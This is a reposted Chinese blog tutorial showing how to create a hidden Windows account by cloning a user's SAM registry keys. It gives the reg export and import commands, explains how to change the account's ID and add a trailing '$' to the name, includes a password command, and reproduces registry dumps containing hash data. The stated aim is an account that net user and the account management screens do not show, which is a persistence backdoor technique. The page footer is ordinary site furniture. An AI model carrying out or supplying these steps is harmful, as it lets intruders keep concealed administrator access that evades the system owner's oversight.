Windows Create Hide User


转自:http://codeliker.github.io/hack/2014/11/22/windows-create-hide-user/


22 November 2014

Overview

使用注册表操作,可以添加隐藏账户,在cmd下,net usernet localgroup administrators命令看不到。账户界面中也看不到,用户和组中也看不到该用户。只有注册表中可以看到。该方法实际上就是通过注册表来克隆用户。

基础知识介绍及原理说明

1.hklm\sam\sam赋予管理员完全控制权限或者以system权限运行命令;

2.HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\names中存储的是用户账户,每个账户里面的内容对应其类型,如0x14f0x3e8等,即用户ID,如:

	HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\names\2008

	HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\names\Administrator

	HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\names\Guest

	HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\names\test

3.每个账户的类型(即ID)对应HKEY_LOCAL_MACHINE\sam\sam\domains\account\users下相应的子键,如0x1f4对应HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\000001F4HKEY_LOCAL_MACHINE\sam\sam\domains\account\users内容示例:

	HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\000001F4
	HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\000001F5
	HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\000003E8
	HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\000003E9
	HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\Names

4.ID对应的子键中存储了账户的信息,F项存储其权限相关信息,V存储了其上次登录时间、修改密码、密码HASH等值。内容示例如下:

	HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\000001F4
	F    REG_BINARY    02000100000000008ACABCE62E89CB010000000000000000000000000000000000000000000000000000000000000000F401000001020000100000000000000000000600010000000000000031003100
	V    REG_BINARY    00000000BC00000002000100BC0000001A00000000000000D80000000000000000000000D80000001A00000000000000F40000000000000000000000F40000000000000000000000F40000000000000000000000F40000000000000000000000F40000000000000000000000F40000000000000000000000F40000000000000000000000F400000015000000A80000000C01000008000000010000001401000004000000000000001801000014000000000000002C0100000400000000000000300100000400000000000000010014809C000000AC0000001400000044000000020030000200000002C014004400050101010000000000010000000002C01400FFFF1F000101000000000005070000000200580003000000000014005B03020001010000000000010000000000001800FF070F000102000000000005200000002002000000002400440002000105000000000005150000008D86E99B38BC9047FE2ACA9DF40100000102000000000005200000002002000001020000000000052000000020020000410064006D0069006E006900730074007200610074006F0072006400A17B0674A18B977B3A672800DF572900847685516E7F105E37627500FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF00010001020000070000000300010003000100A3B16F6C86F546A2D693FF6D6A854B2D0300010003000100

5.Windows实际登录时是根据上述表项确定用户是否存在、用户权限、用户信息等的。因此,通过克隆某用户的相关注册表项,即可达到克隆账户目录,从而建立隐藏账户。不过,需要注意的时,克隆出来的用户ID不能已经存在,也就是说我们需要修改用户ID。

操作方法

1.假设我们要克隆2008这个用户。先导出该用户的type(即ID):

	reg export hklm\sam\sam\domains\account\users\names\2008 hide.reg

这样,就把2008type导出到了hide.reg中,其内容为:

	Windows Registry Editor Version 5.00


	[HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\names\2008]

	@=hex(3e8):

2.导出该用户type对应的注册表项:

	 reg export hklm\sam\sam\domains\account\users\000003e8 hide_type.reg

这样就把2008的用户信息导出到了hide_type.reg中,其内容为:

	Windows Registry Editor Version 5.00

	[HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\000003e8]

	"F"=hex:02,00,01,00,00,00,00,00,5f,50,d4,48,0c,06,d0,01,00,00,00,00,00,00,00,\

	00,82,36,49,6a,61,ea,cf,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  		
	e8,03,00,00,01,02,00,00,14,00,00,00,56,00,a8,03,00,00,05,00,01,00,00,00,00,\
  		
	00,a5,00,00,00,00,00

	"V"=hex:00,00,00,00,bc,00,00,00,02,00,01,00,bc,00,00,00,08,00,00,00,00,00,00,\
  
	00,c4,00,00,00,00,00,00,00,00,00,00,00,c4,00,00,00,00,00,00,00,00,00,00,00,\
  
	c4,00,00,00,00,00,00,00,00,00,00,00,c4,00,00,00,00,00,00,00,00,00,00,00,c4,\
  	
	00,00,00,00,00,00,00,00,00,00,00,c4,00,00,00,00,00,00,00,00,00,00,00,c4,00,\
  
	00,00,00,00,00,00,00,00,00,00,c4,00,00,00,00,00,00,00,00,00,00,00,c4,00,00,\

	00,00,00,00,00,00,00,00,00,c4,00,00,00,15,00,00,00,a8,00,00,00,dc,00,00,00,\
	
	08,00,00,00,01,00,00,00,e4,00,00,00,04,00,00,00,00,00,00,00,e8,00,00,00,14,\
  		
	00,00,00,00,00,00,00,fc,00,00,00,04,00,00,00,00,00,00,00,00,01,00,00,04,00,\
	
	00,00,00,00,00,00,01,00,14,80,9c,00,00,00,ac,00,00,00,14,00,00,00,44,00,00,\

	00,02,00,30,00,02,00,00,00,02,c0,14,00,44,00,05,01,01,01,00,00,00,00,00,01,\

	00,00,00,00,02,c0,14,00,ff,07,0f,00,01,01,00,00,00,00,00,05,07,00,00,00,02,\
	
	00,58,00,03,00,00,00,00,00,24,00,44,00,02,00,01,05,00,00,00,00,00,05,15,00,\

	00,00,8d,86,e9,9b,38,bc,90,47,fe,2a,ca,9d,e8,03,00,00,00,00,18,00,ff,07,0f,\

	00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,00,00,14,00,5b,03,02,00,\

	01,01,00,00,00,00,00,01,00,00,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,\

	02,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,32,00,30,00,30,00,\

	38,00,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,00,01,\

	00,01,02,00,00,07,00,00,00,03,00,01,00,03,00,01,00,09,e1,bc,25,9c,07,0f,57,\

	83,45,56,0f,ab,17,44,60,03,00,01,00,03,00,01,00

3.由于我们是要克隆该用户,需要修改其type(避免用户ID重复),也就是hide.reghex()里面的内容,并且需要把hide.reg中的2008改为我们想要的账户名,例如hide$,然后将hide_type.regHKEY_LOCAL_MACHINE\sam\sam\domains\account\users\000003e8000003e8改为我们设定的值,也就是修改了的type。假设我们改为0x400

4.导入 修改过的 hide.reg 和 hide_type.reg 到注册表中去:

	reg import hide.reg

	reg import hide_type.reg

这样,就克隆了2008这个用户了,其用户名为hide$,ID0x400。由于这里的注册表项存储的HASHID关联,当修改了ID之后,用户HASH随之改变了,也就是说密码与原用户密码不同。因此,克隆完后,需要修改hide$的密码

	net user hide$ P@ssw0rd

这样,就只有注册表能看到该用户了。

几点说明

1.对于2008服务器而言,登录界面会出现两个2008用户,点哪个登录都是登陆的2008

2.如果操作过程中ID没有更改或者其他地方失误,可能会导致用户组中存在用户;

3.由于ID变了HASH也就变了,因此需要修改新用户的密码;

4.用户名需要是尾部为’$’的用户名,如果没有, net user 能看到该用户。



  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值